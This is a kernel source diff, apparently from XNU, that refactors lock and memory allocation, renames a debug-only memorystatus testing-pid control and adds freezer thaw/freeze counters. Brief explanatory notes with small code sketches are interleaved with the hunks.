@@ -877,7 +874,7 @@ scan:
                                 * resource shortage.
                                 */
                                if (lf_split(overlap, lock)) {
-                                       FREE(lock, M_LOCKF);
+                                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                        return ENOLCK;
                                }
                        }
@@ -906,7 +903,7 @@ scan:
                        } else {
                                *prev = overlap->lf_next;
                        }
-                       FREE(overlap, M_LOCKF);
+                       kheap_free(KM_LOCKF, overlap, sizeof(struct lockf));
                        continue;
 
                case OVERLAP_STARTS_BEFORE_LOCK:
@@ -1000,7 +997,7 @@ lf_clearlock(struct lockf *unlock)
 
                case OVERLAP_EQUALS_LOCK:
                        *prev = overlap->lf_next;
-                       FREE(overlap, M_LOCKF);
+                       kheap_free(KM_LOCKF, overlap, sizeof(struct lockf));
                        break;
 
                case OVERLAP_CONTAINS_LOCK: /* split it */
@@ -1021,7 +1018,7 @@ lf_clearlock(struct lockf *unlock)
                case OVERLAP_CONTAINED_BY_LOCK:
                        *prev = overlap->lf_next;
                        lf = overlap->lf_next;
-                       FREE(overlap, M_LOCKF);
+                       kheap_free(KM_LOCKF, overlap, sizeof(struct lockf));
                        continue;
 
                case OVERLAP_STARTS_BEFORE_LOCK:
@@ -1346,7 +1343,7 @@ lf_split(struct lockf *lock1, struct lockf *lock2)
         * Make a new lock consisting of the last part of
         * the encompassing lock
         */
-       MALLOC(splitlock, struct lockf *, sizeof *splitlock, M_LOCKF, M_WAITOK);
+       splitlock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK);
        if (splitlock == NULL) {
                return ENOLCK;
        }
@@ -1465,13 +1462,13 @@ lf_print(const char *tag, struct lockf *lock)
                    lock->lf_type == F_RDLCK ? "shared" :
                    lock->lf_type == F_WRLCK ? "exclusive" :
                    lock->lf_type == F_UNLCK ? "unlock" : "unknown",
-                   (intmax_t)lock->lf_start, (intmax_t)lock->lf_end);
+                   (uint64_t)lock->lf_start, (uint64_t)lock->lf_end);
        } else {
                printf(" %s, start 0x%016llx, end 0x%016llx",
                    lock->lf_type == F_RDLCK ? "shared" :
                    lock->lf_type == F_WRLCK ? "exclusive" :
                    lock->lf_type == F_UNLCK ? "unlock" : "unknown",
-                   (intmax_t)lock->lf_start, (intmax_t)lock->lf_end);
+                   (uint64_t)lock->lf_start, (uint64_t)lock->lf_end);
        }
        if (!TAILQ_EMPTY(&lock->lf_blkhd)) {
                printf(" block %p\n", (void *)TAILQ_FIRST(&lock->lf_blkhd));
@@ -1519,7 +1516,7 @@ lf_printlist(const char *tag, struct lockf *lock)
                    lf->lf_type == F_RDLCK ? "shared" :
                    lf->lf_type == F_WRLCK ? "exclusive" :
                    lf->lf_type == F_UNLCK ? "unlock" :
-                   "unknown", (intmax_t)lf->lf_start, (intmax_t)lf->lf_end);
+                   "unknown", (uint64_t)lf->lf_start, (uint64_t)lf->lf_end);
                TAILQ_FOREACH(blk, &lf->lf_blkhd, lf_block) {
                        printf("\n\t\tlock request %p for ", (void *)blk);
                        if (blk->lf_flags & F_POSIX) {
@@ -1535,8 +1532,8 @@ lf_printlist(const char *tag, struct lockf *lock)
                            blk->lf_type == F_RDLCK ? "shared" :
                            blk->lf_type == F_WRLCK ? "exclusive" :
                            blk->lf_type == F_UNLCK ? "unlock" :
-                           "unknown", (intmax_t)blk->lf_start,
-                           (intmax_t)blk->lf_end);
+                           "unknown", (uint64_t)blk->lf_start,
+                           (uint64_t)blk->lf_end);
                        if (!TAILQ_EMPTY(&blk->lf_blkhd)) {
                                panic("lf_printlist: bad list");
                        }
index 69e5f6d69ab161b390aeb7818cfaf18a3059db75..677c73b03ddfb113b9a66b62974f586826b9baed 100644 (file)
@@ -253,13 +253,13 @@ uint64_t memorystatus_jetsam_snapshot_timeout = 0;
 #if DEVELOPMENT || DEBUG
 /*
  * On development and debug kernels, we allow one pid to take ownership
- * of the memorystatus snapshot (via memorystatus_control).
- * If there's an owner, then only they may consume the snapshot.
- * This is used when testing the snapshot interface to avoid racing with other
- * processes on the system that consume snapshots.
+ * of some memorystatus data structures for testing purposes (via memorystatus_control).
+ * If there's an owner, then only they may consume the jetsam snapshot & set freezer probabilities.
+ * This is used when testing these interfaces to avoid racing with other
+ * processes on the system that typically use them (namely OSAnalytics & dasd).
  */
-static pid_t memorystatus_snapshot_owner = 0;
-SYSCTL_INT(_kern, OID_AUTO, memorystatus_snapshot_owner, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_snapshot_owner, 0, "");
+static pid_t memorystatus_testing_pid = 0;
+SYSCTL_INT(_kern, OID_AUTO, memorystatus_testing_pid, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_testing_pid, 0, "");
 #endif /* DEVELOPMENT || DEBUG */
 static void memorystatus_init_jetsam_snapshot_header(memorystatus_jetsam_snapshot_t *snapshot);
 
@@ -276,9 +276,10 @@ SYSCTL_INT(_kern, OID_AUTO, entitled_max_task_pmem, CTLTYPE_INT | CTLFLAG_RW | C
 #endif /* DEVELOPMENT || DEBUG */
 #endif /* __arm64__ */
 
-static lck_grp_attr_t *memorystatus_jetsam_fg_band_lock_grp_attr;
-static lck_grp_t *memorystatus_jetsam_fg_band_lock_grp;
-lck_mtx_t memorystatus_jetsam_fg_band_lock;
+static LCK_GRP_DECLARE(memorystatus_jetsam_fg_band_lock_grp,
+    "memorystatus_jetsam_fg_band");
+LCK_MTX_DECLARE(memorystatus_jetsam_fg_band_lock,
+    &memorystatus_jetsam_fg_band_lock_grp);
 
 /* Idle guard handling */
 
@@ -598,7 +599,7 @@ memorystatus_raise_memlimit(proc_t p, int new_memlimit_active, int new_memlimit_
        int memlimit_mb_active = 0, memlimit_mb_inactive = 0;
        boolean_t memlimit_active_is_fatal = FALSE, memlimit_inactive_is_fatal = FALSE, use_active_limit = FALSE;
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        if (p->p_memstat_memlimit_active > 0) {
                memlimit_mb_active = p->p_memstat_memlimit_active;
@@ -918,9 +919,8 @@ int32_t max_kill_priority = JETSAM_PRIORITY_IDLE;
 
 #if DEVELOPMENT || DEBUG
 
-lck_grp_attr_t *disconnect_page_mappings_lck_grp_attr;
-lck_grp_t *disconnect_page_mappings_lck_grp;
-static lck_mtx_t disconnect_page_mappings_mutex;
+static LCK_GRP_DECLARE(disconnect_page_mappings_lck_grp, "disconnect_page_mappings");
+static LCK_MTX_DECLARE(disconnect_page_mappings_mutex, &disconnect_page_mappings_lck_grp);
 
 extern bool kill_on_no_paging_space;
 #endif /* DEVELOPMENT || DEBUG */
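
LCK_GRP_DECLARE and LCK_MTX_DECLARE define and initialize the lock group and mutex statically, which is why the matching lck_grp_attr_alloc_init()/lck_grp_alloc_init()/lck_mtx_init() calls disappear from memorystatus_init() below. A minimal sketch of the new pattern, with hypothetical names:

static LCK_GRP_DECLARE(example_lck_grp, "example");
static LCK_MTX_DECLARE(example_lock, &example_lck_grp);

static void
example_locked_work(void)
{
        lck_mtx_lock(&example_lock);
        /* ... critical section; the mutex needs no runtime init ... */
        lck_mtx_unlock(&example_lock);
}
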
@@ -1174,7 +1174,7 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_disconnect_page_mappings, CTLTYPE_INT
 static void
 memorystatus_sort_bucket_locked(unsigned int bucket_index, int sort_order)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        if (memstat_bucket[bucket_index].count == 0) {
                return;
        }
@@ -1406,21 +1406,11 @@ memorystatus_init(void)
 #endif
 
 #if DEVELOPMENT || DEBUG
-       disconnect_page_mappings_lck_grp_attr = lck_grp_attr_alloc_init();
-       disconnect_page_mappings_lck_grp = lck_grp_alloc_init("disconnect_page_mappings", disconnect_page_mappings_lck_grp_attr);
-
-       lck_mtx_init(&disconnect_page_mappings_mutex, disconnect_page_mappings_lck_grp, NULL);
-
        if (kill_on_no_paging_space) {
                max_kill_priority = JETSAM_PRIORITY_MAX;
        }
 #endif
 
-       memorystatus_jetsam_fg_band_lock_grp_attr = lck_grp_attr_alloc_init();
-       memorystatus_jetsam_fg_band_lock_grp =
-           lck_grp_alloc_init("memorystatus_jetsam_fg_band", memorystatus_jetsam_fg_band_lock_grp_attr);
-       lck_mtx_init(&memorystatus_jetsam_fg_band_lock, memorystatus_jetsam_fg_band_lock_grp, NULL);
-
        /* Init buckets */
        for (i = 0; i < MEMSTAT_BUCKET_COUNT; i++) {
                TAILQ_INIT(&memstat_bucket[i].list);
@@ -1625,6 +1615,8 @@ memorystatus_init(void)
 /* Centralised for the purposes of allowing panic-on-jetsam */
 extern void
 vm_run_compactor(void);
+extern void
+vm_wake_compactor_swapper(void);
 
 /*
  * The jetsam no frills kill call
@@ -1694,7 +1686,17 @@ memorystatus_do_kill(proc_t p, uint32_t cause, os_reason_t jetsam_reason, uint64
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_START,
            victim_pid, cause, vm_page_free_count, *footprint_of_killed_proc, 0);
 
-       vm_run_compactor();
+       if (jetsam_reason->osr_code == JETSAM_REASON_VNODE) {
+               /*
+                * vnode jetsams are synchronous and not caused by memory pressure.
+                * Running the compactor on this thread adds significant latency to the filesystem operation
+                * that triggered this jetsam.
+                * Kick off the compactor thread asynchronously instead.
+                */
+               vm_wake_compactor_swapper();
+       } else {
+               vm_run_compactor();
+       }
 
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_END,
            victim_pid, cause, vm_page_free_count, 0, 0);
@@ -2713,8 +2715,8 @@ memorystatus_remove(proc_t p)
 #endif
 
 #if DEVELOPMENT || DEBUG
-       if (p->p_pid == memorystatus_snapshot_owner) {
-               memorystatus_snapshot_owner = 0;
+       if (p->p_pid == memorystatus_testing_pid) {
+               memorystatus_testing_pid = 0;
        }
 #endif /* DEVELOPMENT || DEBUG */
 
@@ -3434,6 +3436,10 @@ memorystatus_on_resume(proc_t p)
                        p->p_memstat_state |= P_MEMSTAT_REFREEZE_ELIGIBLE;
                        memorystatus_refreeze_eligible_count++;
                }
+               if (p->p_memstat_thaw_count == 0 || p->p_memstat_last_thaw_interval < memorystatus_freeze_current_interval) {
+                       os_atomic_inc(&(memorystatus_freezer_stats.mfs_processes_thawed), relaxed);
+               }
+               p->p_memstat_last_thaw_interval = memorystatus_freeze_current_interval;
                p->p_memstat_thaw_count++;
 
                memorystatus_thaw_count++;
@@ -4812,7 +4818,7 @@ memorystatus_get_task_phys_footprint_page_counts(task_t task,
 static bool
 memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *dst_snapshot, unsigned int dst_snapshot_size, const memorystatus_jetsam_snapshot_entry_t *src_entry)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        assert(dst_snapshot);
 
        if (dst_snapshot->entry_count == dst_snapshot_size) {
@@ -4831,7 +4837,7 @@ memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *d
 static bool
 memorystatus_init_jetsam_snapshot_entry_with_kill_locked(memorystatus_jetsam_snapshot_t *snapshot, proc_t p, uint32_t kill_cause, uint64_t killtime, memorystatus_jetsam_snapshot_entry_t **entry)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        memorystatus_jetsam_snapshot_entry_t *snapshot_list = snapshot->entries;
        size_t i = snapshot->entry_count;
 
@@ -4863,7 +4869,7 @@ memorystatus_update_jetsam_snapshot_entry_locked(proc_t p, uint32_t kill_cause,
        bool copied_to_freezer_snapshot = false;
 #endif /* CONFIG_FREEZE */
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        if (memorystatus_jetsam_snapshot_count == 0) {
                /*
@@ -5264,7 +5270,7 @@ memorystatus_init_jetsam_snapshot_locked(memorystatus_jetsam_snapshot_t *od_snap
        memorystatus_jetsam_snapshot_entry_t *snapshot_list = NULL;
        unsigned int snapshot_max = 0;
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        if (od_snapshot) {
                /*
@@ -5352,7 +5358,7 @@ memorystatus_cmd_set_panic_bits(user_addr_t buffer, size_t buffer_size)
 static int
 memorystatus_verify_sort_order(unsigned int bucket_index, pid_t *expected_order, size_t num_pids)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        int error = 0;
        proc_t p = NULL;
@@ -6995,7 +7001,7 @@ memorystatus_cmd_get_jetsam_snapshot(int32_t flags, user_addr_t buffer, size_t b
                                 */
                                proc_list_lock();
 #if DEVELOPMENT || DEBUG
-                               if (memorystatus_snapshot_owner != 0 && memorystatus_snapshot_owner != current_proc()->p_pid) {
+                               if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) {
                                        /* Snapshot is currently owned by someone else. Don't consume it. */
                                        proc_list_unlock();
                                        goto out;
@@ -7037,27 +7043,27 @@ out:
 
 #if DEVELOPMENT || DEBUG
 static int
-memorystatus_cmd_set_jetsam_snapshot_ownership(int32_t flags)
+memorystatus_cmd_set_testing_pid(int32_t flags)
 {
        int error = EINVAL;
        proc_t caller = current_proc();
        assert(caller != kernproc);
        proc_list_lock();
-       if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP) {
-               if (memorystatus_snapshot_owner == 0) {
-                       memorystatus_snapshot_owner = caller->p_pid;
+       if (flags & MEMORYSTATUS_FLAGS_SET_TESTING_PID) {
+               if (memorystatus_testing_pid == 0) {
+                       memorystatus_testing_pid = caller->p_pid;
                        error = 0;
-               } else if (memorystatus_snapshot_owner == caller->p_pid) {
+               } else if (memorystatus_testing_pid == caller->p_pid) {
                        error = 0;
                } else {
                        /* We don't allow ownership to be taken from another proc. */
                        error = EBUSY;
                }
-       } else if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP) {
-               if (memorystatus_snapshot_owner == caller->p_pid) {
-                       memorystatus_snapshot_owner = 0;
+       } else if (flags & MEMORYSTATUS_FLAGS_UNSET_TESTING_PID) {
+               if (memorystatus_testing_pid == caller->p_pid) {
+                       memorystatus_testing_pid = 0;
                        error = 0;
-               } else if (memorystatus_snapshot_owner != 0) {
+               } else if (memorystatus_testing_pid != 0) {
                        /* We don't allow ownership to be taken from another proc. */
                        error = EPERM;
                }
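
A user-space sketch of how a test might drive the renamed command on DEVELOPMENT/DEBUG kernels; the memorystatus_control() prototype and header are assumed, while the command and flag names come from this change:

#include <errno.h>
#include <sys/kern_memorystatus.h>

static int
claim_memorystatus_testing_pid(void)
{
        /* become the testing pid for snapshots & freezer probabilities */
        if (memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0,
            MEMORYSTATUS_FLAGS_SET_TESTING_PID, NULL, 0) != 0) {
                return errno;   /* EBUSY if another process already owns them */
        }
        /* ... consume jetsam snapshots, set freezer probabilities ... */
        if (memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0,
            MEMORYSTATUS_FLAGS_UNSET_TESTING_PID, NULL, 0) != 0) {
                return errno;
        }
        return 0;
}
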
@@ -7281,6 +7287,13 @@ memorystatus_cmd_grp_set_probabilities(user_addr_t buffer, size_t buffer_size)
        size_t entry_count = 0, i = 0;
        memorystatus_internal_probabilities_t *tmp_table_new = NULL, *tmp_table_old = NULL;
        size_t tmp_table_new_size = 0, tmp_table_old_size = 0;
+#if DEVELOPMENT || DEBUG
+       if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) {
+               /* Probabilities are currently owned by someone else. Don't change them. */
+               error = EPERM;
+               goto out;
+       }
+#endif /* DEVELOPMENT || DEBUG */
 
        /* Verify inputs */
        if ((buffer == USER_ADDR_NULL) || (buffer_size == 0)) {
@@ -7679,7 +7692,7 @@ memorystatus_set_memlimit_properties_internal(proc_t p, memorystatus_memlimit_pr
 {
        int error = 0;
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        /*
         * Store the active limit variants in the proc.
@@ -7938,8 +7951,8 @@ memorystatus_control(struct proc *p __unused, struct memorystatus_control_args *
                error = memorystatus_cmd_get_jetsam_snapshot((int32_t)args->flags, args->buffer, args->buffersize, ret);
                break;
 #if DEVELOPMENT || DEBUG
-       case MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP:
-               error = memorystatus_cmd_set_jetsam_snapshot_ownership((int32_t) args->flags);
+       case MEMORYSTATUS_CMD_SET_TESTING_PID:
+               error = memorystatus_cmd_set_testing_pid((int32_t) args->flags);
                break;
 #endif
        case MEMORYSTATUS_CMD_GET_PRESSURE_STATUS:
index 1dfa926e9a02ce3a42cb5dff12e46af38639ad8f..930b2c3c1eb512611ed5ebd6a7078401f8d232e6 100644 (file)
@@ -96,9 +96,8 @@ unsigned long freeze_threshold_percentage = 50;
 
 #if CONFIG_FREEZE
 
-lck_grp_attr_t *freezer_lck_grp_attr;
-lck_grp_t *freezer_lck_grp;
-static lck_mtx_t freezer_mutex;
+static LCK_GRP_DECLARE(freezer_lck_grp, "freezer");
+static LCK_MTX_DECLARE(freezer_mutex, &freezer_lck_grp);
 
 /* Thresholds */
 unsigned int memorystatus_freeze_threshold = 0;
@@ -129,60 +128,7 @@ unsigned int memorystatus_thaw_count = 0; /* # of thaws in the current freezer i
 uint64_t memorystatus_thaw_count_since_boot = 0; /* The number of thaws since boot */
 unsigned int memorystatus_refreeze_eligible_count = 0; /* # of processes currently thawed i.e. have state on disk & in-memory */
 
-/* Freezer counters collected for telemtry */
-static struct memorystatus_freezer_stats_t {
-       /*
-        * # of processes that we've considered freezing.
-        * Used to normalize the error reasons below.
-        */
-       uint64_t mfs_process_considered_count;
-
-       /*
-        * The following counters track how many times we've failed to freeze
-        * a process because of a specific FREEZER_ERROR.
-        */
-       /* EXCESS_SHARED_MEMORY */
-       uint64_t mfs_error_excess_shared_memory_count;
-       /* LOW_PRIVATE_SHARED_RATIO */
-       uint64_t mfs_error_low_private_shared_ratio_count;
-       /* NO_COMPRESSOR_SPACE */
-       uint64_t mfs_error_no_compressor_space_count;
-       /* NO_SWAP_SPACE */
-       uint64_t mfs_error_no_swap_space_count;
-       /* pages < memorystatus_freeze_pages_min */
-       uint64_t mfs_error_below_min_pages_count;
-       /* dasd determined it was unlikely to be relaunched. */
-       uint64_t mfs_error_low_probability_of_use_count;
-       /* transient reasons (like inability to acquire a lock). */
-       uint64_t mfs_error_other_count;
-
-       /*
-        * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold.
-        * Used to normalize skipped_full_count and shared_mb_high_count.
-        */
-       uint64_t mfs_below_threshold_count;
-
-       /* Skipped running the freezer because we were out of slots */
-       uint64_t mfs_skipped_full_count;
-
-       /* Skipped running the freezer because we were over the shared mb limit*/
-       uint64_t mfs_skipped_shared_mb_high_count;
-
-       /*
-        * How many pages have not been sent to swap because they were in a shared object?
-        * This is being used to gather telemtry so we can understand the impact we'd have
-        * on our NAND budget if we did swap out these pages.
-        */
-       uint64_t mfs_shared_pages_skipped;
-
-       /*
-        * A running sum of the total number of bytes sent to NAND during
-        * refreeze operations since boot.
-        */
-       uint64_t mfs_bytes_refrozen;
-       /* The number of refreeze operations since boot */
-       uint64_t mfs_refreeze_count;
-} memorystatus_freezer_stats = {0};
+struct memorystatus_freezer_stats_t memorystatus_freezer_stats = {0};
 
 #endif /* XNU_KERNEL_PRIVATE */
 
@@ -208,6 +154,7 @@ static throttle_interval_t throttle_intervals[] = {
 };
 throttle_interval_t *degraded_throttle_window = &throttle_intervals[0];
 throttle_interval_t *normal_throttle_window = &throttle_intervals[1];
+uint32_t memorystatus_freeze_current_interval = 0;
 
 extern uint64_t vm_swap_get_free_space(void);
 extern boolean_t vm_swap_max_budget(uint64_t *);
@@ -226,6 +173,7 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_count, CTLFLAG_RD | CTLFLAG_LOC
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count, 0, "");
 SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_thaw_count_since_boot, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count_since_boot, "");
 SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_freeze_pageouts, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_pageouts, "");
+SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_interval, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_current_interval, 0, "");
 #if DEVELOPMENT || DEBUG
 static int sysctl_memorystatus_freeze_budget_pages_remaining SYSCTL_HANDLER_ARGS
 {
@@ -285,27 +233,21 @@ static_assert(_kMemorystatusFreezeSkipReasonMax <= UINT8_MAX);
 static int sysctl_memorystatus_freezer_thaw_percentage SYSCTL_HANDLER_ARGS
 {
 #pragma unused(arg1, arg2)
-       size_t thaw_count = 0, frozen_count = 0;
+       uint64_t thaw_count = 0, frozen_count = 0;
        int thaw_percentage = 100;
-       unsigned int band = (unsigned int) memorystatus_freeze_jetsam_band;
-       proc_t p = PROC_NULL;
-       proc_list_lock();
-
-       p = memorystatus_get_first_proc_locked(&band, FALSE);
+       frozen_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_frozen), relaxed);
+       thaw_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_thawed), relaxed);
 
-       while (p) {
-               if (p->p_memstat_state & P_MEMSTAT_FROZEN) {
-                       if (p->p_memstat_thaw_count > 0) {
-                               thaw_count++;
-                       }
-                       frozen_count++;
-               }
-               p = memorystatus_get_next_proc_locked(&band, p, FALSE);
-       }
-       proc_list_unlock();
        if (frozen_count > 0) {
-               assert(thaw_count <= frozen_count);
-               thaw_percentage = (int)(100 * thaw_count / frozen_count);
+               if (thaw_count > frozen_count) {
+                       /*
+                        * Both counts are using relaxed atomics & could be out of sync
+                        * causing us to see thaw_percentage > 100.
+                        */
+                       thaw_percentage = 100;
+               } else {
+                       thaw_percentage = (int)(100 * thaw_count / frozen_count);
+               }
        }
        return sysctl_handle_int(oidp, &thaw_percentage, 0, req);
 }
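
Worked example of the reworked accounting: if mfs_processes_frozen is seeded with 10 at the start of a freezer interval and 4 distinct processes are resumed during it, this handler reports 100 * 4 / 10 = 40. Because both counters are read with relaxed atomics, a momentary reading of more thaws than freezes is simply clamped to 100 rather than asserted on.
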
@@ -313,16 +255,28 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_freezer_thaw_percentage, CTLTYPE_INT |
 
 #define FREEZER_ERROR_STRING_LENGTH 128
 
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_min, &memorystatus_freeze_pages_min, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_max, &memorystatus_freeze_pages_max, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_processes_max, &memorystatus_frozen_processes_max, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_jetsam_band, &memorystatus_freeze_jetsam_band, JETSAM_PRIORITY_IDLE, JETSAM_PRIORITY_MAX - 1, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_private_shared_pages_ratio, &memorystatus_freeze_private_shared_pages_ratio, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_min_processes, &memorystatus_freeze_suspended_threshold, 0, UINT32_MAX, "");
+/*
+ * max. # of frozen process demotions we will allow in our daily cycle.
+ */
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_max_freeze_demotions_daily, &memorystatus_max_frozen_demotions_daily, 0, UINT32_MAX, "");
+
+/*
+ * min # of thaws needed by a process to protect it from getting demoted into the IDLE band.
+ */
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_thaw_count_demotion_threshold, &memorystatus_thaw_count_demotion_threshold, 0, UINT32_MAX, "");
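
The EXPERIMENT_FACTOR_UINT declarations above replace DEVELOPMENT/DEBUG-only SYSCTL_UINTs removed further down, keeping these freezer tunables adjustable on all kernel configurations with an explicit valid range. A hypothetical factor following the same pattern (the variable and name are invented here):

static uint32_t example_freezer_knob = 8;
EXPERIMENT_FACTOR_UINT(_kern, example_freezer_knob, &example_freezer_knob,
    0, UINT32_MAX, "");
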
+
 #if DEVELOPMENT || DEBUG
 
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_jetsam_band, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_jetsam_band, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_daily_mb_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_daily_mb_max, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_degraded_mode, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_degradation, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_threshold, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_min, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_min, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_max, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_refreeze_eligible_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_refreeze_eligible_count, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_processes_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_frozen_processes_max, 0, "");
 
 /*
  * Max. shared-anonymous memory in MB that can be held by frozen processes in the high jetsam band.
@@ -334,18 +288,6 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_max, CTLFLAG_RW | CTL
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_frozen_shared_mb, 0, "");
 
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_per_process_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_shared_mb_per_process_max, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_private_shared_pages_ratio, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_private_shared_pages_ratio, 0, "");
-
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_min_processes, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_suspended_threshold, 0, "");
-
-/*
- * max. # of frozen process demotions we will allow in our daily cycle.
- */
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_max_freeze_demotions_daily, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_max_frozen_demotions_daily, 0, "");
-/*
- * min # of thaws needed by a process to protect it from getting demoted into the IDLE band.
- */
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count_demotion_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_thaw_count_demotion_threshold, 0, "");
 
 boolean_t memorystatus_freeze_throttle_enabled = TRUE;
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_throttle_enabled, 0, "");
@@ -462,6 +404,7 @@ again:
                                p->p_memstat_state |= P_MEMSTAT_FROZEN;
                                p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone;
                                memorystatus_frozen_count++;
+                               os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed);
                                if (memorystatus_frozen_count == memorystatus_frozen_processes_max) {
                                        memorystatus_freeze_out_of_slots();
                                }
@@ -811,7 +754,7 @@ continue_eval:
                                for (j = 0; j < entry_count; j++) {
                                        if (strncmp(memorystatus_global_probabilities_table[j].proc_name,
                                            p->p_name,
-                                           MAXCOMLEN + 1) == 0) {
+                                           MAXCOMLEN) == 0) {
                                                probability_of_use = memorystatus_global_probabilities_table[j].use_probability;
                                                break;
                                        }
@@ -1176,11 +1119,6 @@ memorystatus_freeze_init(void)
        kern_return_t result;
        thread_t thread;
 
-       freezer_lck_grp_attr = lck_grp_attr_alloc_init();
-       freezer_lck_grp = lck_grp_alloc_init("freezer", freezer_lck_grp_attr);
-
-       lck_mtx_init(&freezer_mutex, freezer_lck_grp, NULL);
-
        /*
